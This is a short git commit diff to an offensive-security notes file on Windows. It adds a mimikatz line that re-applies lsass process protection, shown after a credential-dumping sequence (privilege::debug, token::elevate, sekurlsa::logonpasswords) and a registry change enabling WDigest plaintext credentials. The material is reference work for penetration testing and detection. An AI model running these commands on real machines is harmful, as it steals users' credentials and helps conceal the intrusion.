add mimikatz command to protect a process again after removing the protection

fe4e984055/mimikatz/modules/kuhl_m_kernel.c (L99)
2024-05-24 18:26:24 +02:00 · 2021-02-17 12:15:47 +01:00 · 2021-02-17 12:15:47 +01:00 · 9be371d793
parent f6f8ec010a
commit 9be371d793
1 changed files with 3 additions and 0 deletions
--- a/Resources/Windows
+++ b/Resources/Windows
@ -77,6 +77,9 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
  mimikatz # privilege::debug    
  mimikatz # token::elevate
  mimikatz # sekurlsa::logonpasswords
+  
+  # Now lets re-add the protection flags to the lsass.exe process
+  mimikatz # !processprotect /process:lsass.exe
  ```

 - LSA is running as virtualized process (LSAISO) by **Credential Guard**